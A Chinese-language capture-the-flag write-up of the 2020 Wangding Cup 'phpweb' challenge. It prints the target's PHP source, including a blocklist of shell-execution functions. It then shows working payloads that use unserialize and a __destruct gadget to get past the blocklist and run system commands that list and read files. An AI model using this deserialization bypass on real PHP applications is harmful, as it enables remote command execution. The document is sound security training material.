[网鼎杯 2020 朱雀组]phpweb

其实最开始我是觉得应该是抓包的,但是意识不够好,不知道post传输里面就是我们想要的敲门砖

含泪看wp

抓包,post运输有鬼

image-20250319224238228

第一个考点:

去搜才知道这是Linux的date看日期函数,于是我们便尝试读取源文件:

image-20250319224222920

得到:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
<?php
    $disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert","substr_replace","call_user_func_array","call_user_func","array_filter", "array_walk",  "array_map","registregister_shutdown_function","register_tick_function","filter_var", "filter_var_array", "uasort", "uksort", "array_reduce","array_walk", "array_walk_recursive","pcntl_exec","fopen","fwrite","file_put_contents");
    function gettime($func, $p) {
        $result = call_user_func($func, $p);
        $a= gettype($result);
        if ($a == "string") {
            return $result;
        } else {return "";}
    }
    class Test {
        var $p = "Y-m-d h:i:s a";
        var $func = "date";
        function __destruct() {
            if ($this->func != "") {
                echo gettime($this->func, $this->p);
            }
        }
    }
    $func = $_REQUEST["func"];
    $p = $_REQUEST["p"];

    if ($func != null) {
        $func = strtolower($func);
        if (!in_array($func,$disable_fun)) {
            echo gettime($func, $p);
        }else {
            die("Hacker...");
        }
    }
    ?>

分部解析:

1
2
3
4
5
6
7
8
1.
 function gettime($func, $p) {
        $result = call_user_func($func, $p);
        $a= gettype($result);
        if ($a == "string") {
            return $result;
        } else {return "";}
    }

call_user_func:是函数执行函数,会把$func作为函数执行,只要调用gettime类就会调用执行函数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
2.
class Test {
        var $p = "Y-m-d h:i:s a";
        var $func = "date";
        function __destruct() {
            if ($this->func != "") {
                echo gettime($this->func, $this->p);
            }
        }
    }
3.
    $func = $_REQUEST["func"];
    $p = $_REQUEST["p"];

    if ($func != null) {
        $func = strtolower($func);
        if (!in_array($func,$disable_fun)) {
            echo gettime($func, $p);
        }else {
            die("Hacker...");
        }
    }

看起来是给1:call_user_func做基础赋值

2:调用函数查看传输是否存在禁用函数

但是存在本题的第二个考点

第二个考点:(利用序列化绕过查看禁用)

1
2
3
function __destruct() {
            if ($this->func != "") {
                echo gettime($this->func, $this->p);

就是考察反序列化,在反序列化结束会直接调用gettime不会被禁用函数发现

直接构建payload:

1
func=unserialize&p=O:4:"Test":2:{s:1:"p";s:4:"ls /";s:4:"func";s:6:"system";}

image-20250319230550636

发现没有flag文件,最后我们就使用查找函数吧。

1
func=unserialize&p=O:4:"Test":2:{s:1:"p";s:19:"find / -name *flag*";s:4:"func";s:6:"system";}

image-20250319230533829

正常来说是要一个一个写进去验证的,懒得,直接看wp吧

1
func=unserialize&p=O:4:"Test":2:{s:1:"p";s:22:"cat /tmp/flagoefiu4r93";s:4:"func";s:6:"system";}

(重点:p要在func前面)

直接获得flag

backtop